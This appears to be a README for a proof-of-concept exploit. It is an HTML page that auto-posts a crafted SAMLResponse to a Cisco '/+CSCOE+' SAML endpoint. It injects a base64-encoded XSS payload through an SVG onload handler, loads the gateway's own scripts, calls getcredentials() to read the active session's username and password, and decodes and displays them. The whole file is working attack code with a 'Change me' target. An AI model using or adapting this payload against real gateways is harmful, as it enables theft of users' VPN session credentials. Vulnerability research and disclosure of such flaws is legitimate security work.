README.md
Rendering markdown...
<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<form id="csrf" action="" method="POST">
<input id="SAMLResponse" name="SAMLResponse" value=''>
<input type="submit" value="XSS">
</form>
<script>
target = "https://localhost"; // Change me
form = document.getElementById("csrf");
form.action = target + "/+CSCOE+/saml/sp/acs?tgname=a";
payload = `
submit_saml = function() {}; //Prevent page from redirecting to logon.html causing the sesison to clear.
s = document.createElement("script");
s.src = "`+ target + `/+CSCOE+/common.js"; // Cisco string utilities: hex_2_ascii & rot13.
document.body.appendChild(s);
s = document.createElement("script");
s.src = "` + target + `/+CSCOE+/appstart.js"; // Utilities leaking active session credentials via getcredentials().
document.body.appendChild(s);
document.onreadystatechange = function() {
creds = getcredentials();
alert(rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])) + ":" + rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])));
}`;
saml = document.getElementById('SAMLResponse');
saml.value = '"><svg/onload=eval(atob("' + btoa(payload) + '"))>';
</script>
</body>
</html>